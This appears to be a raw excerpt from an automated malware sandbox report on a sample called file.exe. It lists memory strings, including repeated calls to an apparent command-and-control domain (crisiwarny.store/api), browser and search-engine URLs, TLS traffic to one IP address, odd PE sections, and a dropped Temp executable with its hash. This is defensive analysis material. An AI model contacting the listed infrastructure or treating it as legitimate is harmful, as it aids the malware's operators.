Source: file.exe, 00000000.00000003.2168486851.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168428370.0000000000D19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2168486851.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168428370.0000000000D19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2168486851.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168428370.0000000000D19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: file.exe, 00000000.00000003.2181790016.0000000000CFE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2134098522.0000000000CFC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300704016.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120298828.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186257640.0000000000CFC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168754605.0000000000CFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/
Source: file.exe, 00000000.00000003.2300704016.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/Y
Source: file.exe, file.exe, 00000000.00000003.2186240547.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2301166696.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300704016.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2300704016.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181975161.0000000000CF9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181772133.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2193032663.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168486851.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168428370.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168676737.0000000000D1D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181616298.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2304049792.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/api
Source: file.exe, 00000000.00000003.2300704016.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apial
Source: file.exe, 00000000.00000003.2300704016.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/apie
Source: file.exe, 00000000.00000003.2300704016.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/h(g
Source: file.exe, 00000000.00000003.2300704016.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2303776820.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/k6lv
Source: file.exe, 00000000.00000003.2150348093.0000000000D1D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2186240547.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2301166696.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181772133.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2193032663.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168486851.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168428370.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168676737.0000000000D1D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2181616298.0000000000D19000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2304049792.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2150139229.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/k:0
Source: file.exe, 00000000.00000003.2300704016.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store:443/api
Source: file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2168428370.0000000000D19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000003.2151867520.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2151867520.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2168486851.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168428370.0000000000D19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: file.exe, 00000000.00000003.2168486851.0000000000D1B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2168428370.0000000000D19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2121027682.00000000056A8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120907179.00000000056AB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2120953022.00000000056A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2151867520.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: file.exe, 00000000.00000003.2151867520.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: file.exe, 00000000.00000003.2151867520.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.2151867520.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2151867520.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: file.exe, 00000000.00000003.2151867520.0000000005ADB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown	HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.170.64:443 -> 192.168.2.5:49716 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: 4LSU4O6YQKPDF8R94WQ6K0Z23.exe.0.dr	Static PE information: section name:
Source: 4LSU4O6YQKPDF8R94WQ6K0Z23.exe.0.dr	Static PE information: section name: .idata

Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00BE9000	3_2_00BE9000
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00A71692	3_2_00A71692
Source: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe	Code function: 3_2_00BECE80	3_2_00BECE80

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\4LSU4O6YQKPDF8R94WQ6K0Z23.exe BDD4E66F1F848BCF6B72E4F57C2095CC0FB9F74E752ED484FD53A6F9886A4352

Source: file.exe, 00000000.00000003.2274539464.0000000005DDE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2284373312.0000000005C63000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2283882117.0000000005D6C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2286419578.0000000005EB0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2271084294.0000000005C71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2273452842.0000000005AB2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2277351253.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2278377513.0000000005C66000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2274631413.0000000005C62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2285093798.0000000005D7E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2276231312.0000000005C67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2273808878.0000000005C62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2284858287.0000000005D74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2273946643.0000000005D09000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2281710862.0000000005D5A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2280659104.0000000005D51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2289021984.0000000005C64000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2276026078.0000000005C68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2279762431.0000000005C71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2284128589.0000000005D70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2271472554.0000000005ABA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2285612574.0000000005C66000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2275825816.0000000005D25000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2288858244.0000000005DAD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2271561053.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2288466179.0000000005ED0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2275730684.0000000005C64000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2299144819.00000000061E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2301166696.0000000000D1C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2276135743.0000000005D35000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2289451717.0000000005C63000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2275002034.0000000005D2A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2287695214.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2270912450.0000000005854000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2276656208.0000000005C63000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2283163377.0000000005E51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2272259651.0000000005AB6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2277016541.0000000005E10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2274109887.0000000005DB6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2300554715.00000000056C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2271303321.0000000005AB6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2275273283.0000000005D29000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2282104383.0000000005D5E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2286106016.0000000005C68000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2266879369.00000000057BF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2280935863.0000000005E3C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2272564721.0000000005C62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2283734472.0000000005C70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2272086668.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2289641313.0000000005DAA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2274458981.0000000005D21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2301108360.0000000005707000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2284745202.0000000005C63000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2275924714.0000000005DEF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2280041662.0000000005D52000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2275094411.0000000005C63000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2285985636.0000000005D90000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2286233208.0000000005D85000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2286781370.0000000005D9F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2274284199.0000000005C6D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2282778047.0000000005C64000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2300592821.0000000005772000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2266879369.0000000005854000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2288145350.0000000005C66000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2272636388.0000000005D11000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2272173576.0000000005C65000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2287949701.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2288614766.0000000005C70000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2282324360.0000000005C64000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2284244963.0000000005E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2279165431.0000000005D3E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2273579485.0000000005C71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2277879145.0000000005D43000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2283285450.0000000005C71000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2288297881.0000000005D96000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2284007962.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2273253720.0000000005C64000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2272355301.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2283401938.0000000005D6E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2276918489.0000000005D3A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2272474555.0000000005ABC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2285238050.0000000005C63000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2284500202.0000000005D69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2280299436.0000000005C69000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2274816817.0000000005DE0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2284627100.0000000005E81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2289163976.0000000005DB0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2274725168.0000000005D1A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2276323029.0000000005D3D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2275634784.0000000005DF1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2287255010.0000000005C62000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2284974525.0000000005C6C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2287445989.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2285492724.0000000005EA1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2281151461.0000000005C6B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
Source: file.exe, 00000000.00000003.2274910632.0000000005C66000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedefOff.exe. vs file.exe
